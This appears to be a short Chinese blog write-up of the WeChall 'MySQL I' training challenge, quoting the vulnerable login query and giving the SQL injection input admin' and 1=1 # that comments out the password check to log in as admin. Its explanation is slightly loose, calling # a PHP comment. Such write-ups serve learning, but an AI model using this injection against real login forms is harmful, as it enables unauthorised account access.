Training: MySQL I (MySQL, Exploit, Training)

题目链接:http://www.wechall.net/challenge/training/mysql/auth_bypass1/index.php?highlight=christmas

的确是非常简单的SQL注入

经过阅读源代码可知判断通过的方式是:

"SELECT * FROM users WHERE username='$username' AND password='$password'";

而且有admin这个用户的特判,利用php的局部注释“#”可以进行攻击:

username输入:admin' and 1=1 #

这里的代码将被翻译成:

username='admin' # and  password='$password'"

所以密码的验证将被忽略,可以作为admin登录

posted @ 2016-10-11 21:28  宋姑娘  阅读(634)  评论(0编辑  收藏  举报